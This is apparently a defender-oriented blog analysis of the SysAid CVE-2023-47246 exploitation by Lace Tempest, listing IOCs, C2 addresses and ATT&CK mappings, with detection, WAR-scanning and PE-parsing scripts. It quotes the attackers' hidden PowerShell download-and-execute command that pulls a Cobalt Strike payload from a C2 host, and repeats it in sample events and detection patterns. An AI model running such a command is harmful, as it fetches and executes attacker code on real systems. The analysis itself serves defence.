Introduction
In this blog post, we’ll investigate the details of CVE-2023-47246, a SysAid On-Prem software vulnerability, and uncover how attackers are compromising endpoints. This post will also discuss how Lace Tempest weaponizes the GraceWire Loader (also known as Turtle Loader, per Microsoft Security Intelligence), and how to recognize the indicators of compromise (IOCs) of active exploitation.
SysAid[1] has advised its clients to update to the newest version, 23.3.36, as a precautionary step.
Indicators of Compromise
Hashes/Names
UserEntry.class:
98d4184379fb6cf08a57f2bc937887965ae3e9c977a87a5c6443bf5c055bfd18
user.bin:
f0fb710ee7b2a7f07acdf87cba7b79331ead0eda74276150fde8413b7793fcd7
user.exe:
b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f2165f2522bf
usersfiles.war:
be4334ce0be2683878c5b9fb911a4fb9beaaa09845028215134081268621df38
IP Addresses
81.19.138[.]52 — GraceWire Loader C2
45.182.189[.]100 — GraceWire Loader C2
179.60.150[.]34 — Cobalt Strike C2
45.155.37[.]105 — Meshagent remote admin tool C2
Adversary TTPs Mapping
Server Software Component: Web Shell — T1505.003
Command and Scripting Interpreter: PowerShell — T1059.001
Process Injection — T1055
Indicator Removal: File Deletion — T1070.004
Exfiltration Over C2 Channel — T1041
Develop Capabilities: Malware — T1587.001
Exploitation for Privilege Escalation — T1068
Threat Actor Information
The threat actor, known by multiple names such as DEV-0950, Storm-0950 and Lace Tempest, is most recently known for actively exploiting an SQL injection vulnerability in MOVEit Transfer (CVE-2023-34362).[3] As per the Microsoft Threat Intelligence team, its typical modus operandi involves exploitation followed by deployment of a web shell with data exfiltration capabilities.[2]
Lace Tempest has been identified as a ransomware group and is known for its involvement with the Cl0p extortion site. The group gained notoriety for its attack on the UK payroll software provider Zellis, an incident that exposed the personal data of thousands of employees at prominent entities such as the BBC, British Airways, Boots UK and the Nova Scotia government.[4]
What exactly is CVE-2023-47246, and how do threat actors get into the victim’s system?
According to SysAid, the vulnerability was identified on November 2nd. Subsequent analysis by their security team disclosed that it is being actively exploited in the wild. CVE-2023-47246 affects SysAid On-Premise versions prior to 23.3.36. It is a path traversal vulnerability that can lead to code execution when an attacker writes a file into the Tomcat webroot. Exploitation in the wild was observed in November 2023.
What happened to SysAid customers? According to SysAid’s investigation
Lace Tempest targeted the “C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\” directory of the SysAid Tomcat web service. The group’s tactic involves uploading a WAR archive containing a web shell to gain unauthorized access and execution. This web shell then serves as a gateway to run a PowerShell script and deploy a malicious binary named “user.exe.”
What exactly is a WAR archive? A WAR (Web Application Archive) is a file format in Java used to package and distribute web applications. It includes JavaServer Pages, servlets, classes, XML files, and other resources in a standardized structure. WAR files simplify deployment by encapsulating all components into a single compressed file, making them portable and compatible with various web servers and application servers.
The purpose of “user.exe” is to act as a loader for the GraceWire trojan. The trojan is then injected into one of several key system processes: “spoolsv.exe,” “msiexec.exe,” or “svchost.exe.” This approach allows Lace Tempest to establish a foothold and carry out its malicious activities within the compromised environment.
Lace Tempest placed their files within the SysAidServer directory under the name “usersfiles.” Fortunately, we managed to secure a copy of the files.
The obtained data reveals two directories, one data file, and a Windows executable built for 64-bit (x64) systems, named ‘user.exe’.
How is Lace Tempest launching the malware loader?
The execution phase initiates after Lace Tempest successfully exploits the vulnerability. At this point, a PowerShell script comes into play, serving as the mechanism to launch the malicious “user.exe.” This marks a critical juncture where the attackers leverage PowerShell for the deployment and execution of their malicious payload, extending their control within the compromised system.
Here’s a sample of the PowerShell script used to load the “user.exe” GraceWire loader.
To aid understanding, comments have been added to the PowerShell script explaining each step’s functionality and its significance within the attack orchestrated by Lace Tempest.
Indicator Removal: File Deletion T1070.004
In this particular task, Lace Tempest employs an additional PowerShell script designed for the deletion of Indicators of Compromise (IOCs). This script likely serves as a means to cover their tracks and erase any traces that could potentially be used for detection or analysis by security professionals.
Here’s a PowerShell script used by Lace Tempest for indicator removal:
The observed script appears to serve several purposes: it cleans up log files matching specific patterns, checks for the existence of particular files, and executes code stored in the SehCore environment variable. This suggests a systematic effort by Lace Tempest to maintain a stealthy presence, eliminate traces, and potentially execute further malicious operations within the compromised environment.
Lace Tempest utilizing Cobalt Strike as a C2 tool
In the ongoing SysAid investigation, Lace Tempest used a PowerShell command to download and execute a Cobalt Strike listener on the targeted hosts. This implies an intention to leverage Cobalt Strike, a well-known penetration testing tool associated with red teaming and adversary simulation. The use of such tooling points towards Lace Tempest being an advanced and targeted threat actor, actively probing and exploiting vulnerabilities within the SysAid environment.
Here’s a sample of the PowerShell command used:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a'))
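The chain described in the sections above (web shell under Tomcat spawning PowerShell, a hidden-window download cradle pulling from a known C2 address, and the loader executing out of the usersfiles directory) is what a detection rule should key on. The following Python is an added example written for this post, not SysAid’s or Microsoft’s code: it runs a few constructed process-creation records (in a simple key="value" form, not real telemetry) through checks built from the command quoted above and the IOC list at the top of the post. The assumption that SysAid’s Tomcat runs under java.exe, so a web shell shows up as java.exe launching powershell.exe, is the example’s own.

```python
import re

# IOCs quoted from this post's indicator list, in the defanged form published above
C2_IPS_DEFANGED = ["81.19.138[.]52", "45.182.189[.]100", "179.60.150[.]34", "45.155.37[.]105"]
C2_IPS = {ip.replace("[.]", ".") for ip in C2_IPS_DEFANGED}

# Switches and cradle idioms seen in the command quoted above; each hit is reported by name
CRADLE_PATTERNS = {
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "web_download": re.compile(r"net\.webclient|downloadstring|downloadfile|Invoke-WebRequest", re.I),
}
# Assumption of this example: the Tomcat service runs under java.exe, so a web shell
# that runs commands appears as java.exe -> powershell.exe in process telemetry
WEB_PARENT = re.compile(r"\\(java|javaw|tomcat\d*)\.exe$", re.I)
# The directory the post names as the drop location for the WAR archive and user.exe
USERSFILES_DIR = re.compile(r"\\SysAidServer\\tomcat\\webapps\\usersfiles\\", re.I)
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def parse_event(line: str) -> dict:
    """Parse one constructed key="value" process-creation record into a dict."""
    return {m.group(1): m.group(2) for m in re.finditer(r'(\w+)="([^"]*)"', line)}


def analyze_event(ev: dict) -> list:
    """Return the name of every indicator matched by a single process-creation event."""
    image = ev.get("Image", "")
    parent = ev.get("ParentImage", "")
    cmd = ev.get("CommandLine", "")
    findings = []
    is_powershell = image.lower().endswith(("powershell.exe", "pwsh.exe"))
    if is_powershell and WEB_PARENT.search(parent):
        findings.append("powershell_spawned_by_web_server")  # T1505.003 web shell -> T1059.001
    if is_powershell:
        hits = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(cmd)]
        if hits:
            findings.append("download_cradle:" + ",".join(hits))
    for ip in IPV4.findall(cmd):
        if ip in C2_IPS:
            findings.append("known_c2:" + ip)
    if USERSFILES_DIR.search(image) or USERSFILES_DIR.search(cmd):
        findings.append("execution_from_usersfiles")  # e.g. user.exe, the GraceWire loader
    return findings


def triage(lines) -> list:
    """Run every record through analyze_event; keep (index, findings) for events that matched."""
    results = []
    for idx, line in enumerate(lines):
        findings = analyze_event(parse_event(line))
        if findings:
            results.append((idx, findings))
    return results


# Constructed sample records (not real telemetry). The second reproduces the command
# quoted in the post; the third is the loader being started from the usersfiles directory.
SAMPLE_EVENTS = [
    r'''ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -Command Get-Process"''',
    r'''ParentImage="C:\Program Files\SysAidServer\jre\bin\java.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150.34:80/a'))"''',
    r'''ParentImage="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Image="C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe" CommandLine="user.exe"''',
]

if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(findings)}")
```

The benign first record produces nothing; the cradle record trips all four command-line checks plus the web-server parent and the C2 address, and the loader record is caught purely on its location. In practice the location rule is the cheapest high-confidence signal here, since nothing legitimate should execute from the usersfiles upload directory.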
Our Findings
Upon investigating the “WEB-INF” directory, specifically “classes/com/ilient/server,” and extracting strings from “UserClassEntry.class,” part of the WAR archive that was uploaded to the server, certain revealing strings come to light. Notably, the presence of strings like “powershell.exe” indicates the use of PowerShell within the uploaded web shell, suggesting an avenue for executing commands and facilitating further malicious activities.
Running the ‘file’ command on “UserClassEntry.class” identifies it as “Compiled Java Class Data.”
powershell.exe in a Java class? Seems a bit odd, right?
According to Microsoft Threat Intelligence (MTI) on Twitter / X:
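Since a WAR file is just a ZIP archive with a fixed layout, the triage described above (list what was dropped into the webapp, confirm each .class entry really is compiled Java, and pull printable strings out of it looking for process-spawning artefacts such as powershell.exe) can be automated. The Python below is an added example written for this post, not tooling from SysAid or the original author. The WAR it scans is constructed in memory: the package path com/ilient/server and the class name come from the post, but the bytes are synthetic stand-ins, not the real uploaded archive.

```python
import io
import re
import zipfile

CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # every compiled Java class starts with this ("Compiled Java class data")
# Substrings that indicate a class may spawn OS processes; Runtime/ProcessBuilder are heuristics
# and will also appear in legitimate code, so treat hits as leads, not verdicts
SUSPICIOUS = ["powershell.exe", "cmd.exe", "/bin/sh", "java/lang/Runtime", "ProcessBuilder"]


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs of at least min_len bytes, like the default output of `strings`."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def scan_war(war_bytes: bytes) -> list:
    """Inventory every file in a WAR; for real .class entries, report suspicious strings."""
    report = []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            entry = {
                "name": info.filename,
                "size": len(data),
                "is_class": data[:4] == CLASS_MAGIC,
                "suspicious": [],
            }
            if entry["is_class"]:
                found = {s for s in ascii_strings(data) for needle in SUSPICIOUS if needle in s}
                entry["suspicious"] = sorted(found)
            report.append(entry)
    return report


def flagged_entries(report: list) -> dict:
    """Map entry name -> suspicious strings for the entries that had any."""
    return {e["name"]: e["suspicious"] for e in report if e["suspicious"]}


def build_sample_war() -> bytes:
    """Constructed WAR for the demo (not the real usersfiles.war): one benign class and one
    fake web-shell class whose constant pool carries powershell.exe and Runtime references."""
    benign_class = CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x01\x00\x10java/lang/Object"
    shell_class = (
        CLASS_MAGIC + b"\x00\x00\x00\x34"
        + b"\x01\x00\x0epowershell.exe"
        + b"\x01\x00\x11java/lang/Runtime"
        + b"\x01\x00\x04exec"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr("WEB-INF/classes/com/example/Hello.class", benign_class)
        zf.writestr("WEB-INF/classes/com/ilient/server/UserClassEntry.class", shell_class)
    return buf.getvalue()


if __name__ == "__main__":
    for entry in scan_war(build_sample_war()):
        kind = "class" if entry["is_class"] else "file "
        print(f"{kind} {entry['size']:6d} {entry['name']}  {entry['suspicious'] or ''}")
```

Point scan_war at the bytes of a recovered archive and the output is a one-screen inventory in which the offending class stands out by its strings. Checking the CAFEBABE magic rather than trusting the .class extension matters because an attacker can name an entry anything; the magic check is what the ‘file’ command is doing above.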
GraceWire Loader: Static Analysis
In this phase, we conduct fundamental static analysis of “user.exe,” a file recognized by SysAid as a loader for the GraceWire Malware. This analysis aims to glean insights into the file’s structure, functions, and potential behaviors, providing a foundational understanding of its role in the broader malicious campaign orchestrated by Lace Tempest.
Strings Extraction
Running strings with the “-e l” option (16-bit little-endian encoding, which catches the UTF-16 strings common in Windows binaries) to extract all the readable strings from “user.exe”.
Utilizing CFFExplorer for Static Analysis
CFFExplorer > File Header > Machine > AMD64 indicates the processor type this file is meant to run on (x64).
GraceWire Loader leveraging KERNEL32.DLL
During the analysis, notable imported modules and APIs come to light, including file, directory, and process-related APIs. These imports give a glimpse into the functionality and capabilities of the malware, shedding light on its potential actions and the extent of control it may exert within the compromised system.
The inclusion of “IsDebuggerPresent” signals an anti-analysis technique: this function is commonly used to detect whether the process is running under a debugger. Its presence suggests the malware is equipped to evade analysis, adding a layer of sophistication to its design.
The presence of “GetTickCount” likewise points to anti-analysis measures. “GetTickCount” returns the system uptime in milliseconds and is often used for timing checks that complicate examination under a debugger or sandbox. This underscores the malware’s intent to operate covertly and avoid detection by security analysts.
GraceWire Loader Dependency Chain
The KERNEL32.dll file is essentially another Portable Executable (PE) file, relying on additional Dynamic Link Libraries (DLLs). These DLLs, in turn, may have dependencies on further DLLs, creating a chain of interdependencies. During execution, the Windows loader is responsible for loading all the DLLs in this chain, highlighting the intricate and interconnected nature of the components involved in the operation of the malware.
We can view the dependency chain by opening the file in “Dependency Walker”.
Utilizing PEStudio
This particular sample has garnered attention from multiple Antivirus (AV) vendors, being flagged as “TurtleLoader.” Considering the timestamp, it indicates that this malware is a recently identified sample, drawing the focus of security solutions as a newly detected threat.
The compiler stamp reveals that this specific sample was compiled on “Wed Aug 30 07:41:06 2023 | UTC.”
The section entropy view shows many sections exceeding a value of 5, which suggests that some sections within the file may be packed. Elevated entropy typically indicates compressed or encrypted content, implying an effort to obfuscate the file’s true nature or hinder straightforward analysis. Additional unpacking and in-depth investigation are therefore needed to reveal the concealed components and functionality of the malware.
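The three header facts pulled out of CFFExplorer and PEStudio above (the AMD64 machine type, the compile timestamp, and per-section entropy) all come from the COFF file header and section table, and can be read without any tool. The Python below is an added example written for this post, not the author’s or any vendor’s code: it parses those structures from raw bytes, computes Shannon entropy per section, and flags candidates for packing. The PE it parses is constructed in memory as a stand-in (an x64 header stamped with the post’s compile time, a low-entropy code section and a uniform-byte section), not the real user.exe. The packing threshold of 7.0 bits per byte is the example’s own default, chosen because plain native code sections normally sit well below it; the post’s observation of sections above 5 is a looser screen.

```python
import calendar
import math
import struct
from datetime import datetime, timezone

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_I386 = 0x14C
MACHINE_NAMES = {IMAGE_FILE_MACHINE_AMD64: "AMD64", IMAGE_FILE_MACHINE_I386: "I386"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for one repeated byte value, 8.0 when all 256 values are equally common."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Read machine type, compile timestamp and the section table (PE32 or PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)          # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4                                          # 20-byte COFF file header
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    sect_off = coff + 20 + opt_size                              # section table follows the optional header
    sections = []
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr, _, _, _, _, _chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, sect_off + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(raw), 2),
        })
    compiled = datetime.fromtimestamp(timestamp, tz=timezone.utc)
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "compiled_utc": compiled.strftime("%a %b %d %H:%M:%S %Y"),
        "sections": sections,
    }


def packed_candidates(info: dict, threshold: float = 7.0) -> list:
    """Names of sections whose entropy exceeds the threshold (likely compressed or encrypted)."""
    return [s["name"] for s in info["sections"] if s["entropy"] > threshold]


def build_sample_pe() -> bytes:
    """Constructed minimal PE32+ image (a stand-in, not the real user.exe): AMD64 machine type,
    the compile time quoted in the post, a two-byte-value .text and a uniform-byte .packed section."""
    ts = calendar.timegm((2023, 8, 30, 7, 41, 6))               # Wed Aug 30 07:41:06 2023 UTC
    text_data = b"\x90" * 200 + b"\xC3" * 56                    # only NOP/RET bytes -> low entropy
    packed_data = bytes(range(256)) * 4                          # every byte value equally often -> 8.0
    opt = struct.pack("<H", 0x20B) + b"\0" * 238                 # PE32+ magic, remaining fields zeroed
    headers_end = 0x40 + 4 + 20 + len(opt) + 40 * 2
    text_ptr = (headers_end + 0x1FF) & ~0x1FF                   # file-align raw data to 512 bytes
    packed_ptr = text_ptr + 0x200
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 2, ts, 0, 0, len(opt), 0x22)

    def section(name, size, vaddr, ptr):
        return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, ptr, 0, 0, 0, 0, 0x60000020)

    image = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))   # DOS header, e_lfanew = 0x40
    image += b"PE\0\0" + coff + opt
    image += section(b".text", len(text_data), 0x1000, text_ptr)
    image += section(b".packed", len(packed_data), 0x2000, packed_ptr)
    image += b"\0" * (text_ptr - len(image)) + text_data
    image += b"\0" * (packed_ptr - len(image)) + packed_data
    return bytes(image)


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(info["machine"], info["compiled_utc"])
    for s in info["sections"]:
        print(f"{s['name']:<8} {s['raw_size']:6d} bytes  entropy {s['entropy']}")
    print("packed candidates:", packed_candidates(info))
```

Feed parse_pe the bytes of a real sample and the same three facts fall out; a timestamp is easily forged, so it is corroborating evidence rather than proof of when a binary was built. Entropy is best read per section, as here, because a packed payload in one section does not necessarily raise the file-wide figure.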
GraceWire Loader: Dynamic SandBox Analysis
Upon submitting the sample to an online sandbox like Hybrid Analysis, the results indicate that the sample is flagged as “malicious” with a high threat score of “100/100.”
The analysis identifies the sample as both “ransomware” and a “webshell.” These classifications align with the earlier findings, affirming the malicious nature of the sample and providing additional context regarding its potential functionalities, including characteristics associated with ransomware and webshells.
Hybrid Analysis has identified suspicious indicators within the sample, highlighting its malware process and registry reconnaissance capabilities. This points to the sample’s ability to engage in activities related to process manipulation and registry exploration, showcasing its multifaceted and potentially harmful functionalities within the compromised system.
It has identified specific APIs within the sample that indicate suspicious activity. The presence of APIs like LoadLibrary() and IsDebuggerPresent() raises concerns about potentially malicious behaviors. LoadLibrary() is often associated with dynamic loading of libraries, a technique employed in various attacks, while IsDebuggerPresent() is indicative of anti-analysis measures. These findings underscore the sample’s intention to engage in suspicious or malicious activities and its efforts to evade detection and analysis.
If you’re interested in the full report, you can view it here: Free Automated Malware Analysis Service — powered by Falcon Sandbox — Viewing online file analysis results for ‘user.exe’ (hybrid-analysis.com)
Conclusion
As technology advances, threat actors are becoming more sophisticated. The prevalence of web shell attacks and zero-day vulnerabilities is increasing. By reading blogs and insights from fellow security researchers, we gain valuable knowledge to better defend against these evolving attacks and improve our detection capabilities. As attackers grow more creative, it is imperative for blue teamers to adapt. This blog aims to provide fresh insights for readers, and we at SBT hope you find this post valuable.
If you found this topic interesting and you don’t have any exposure to Malware Analysis, Reverse Engineering and Incident Response, why not take a look at our Blue Team Labs Online platform?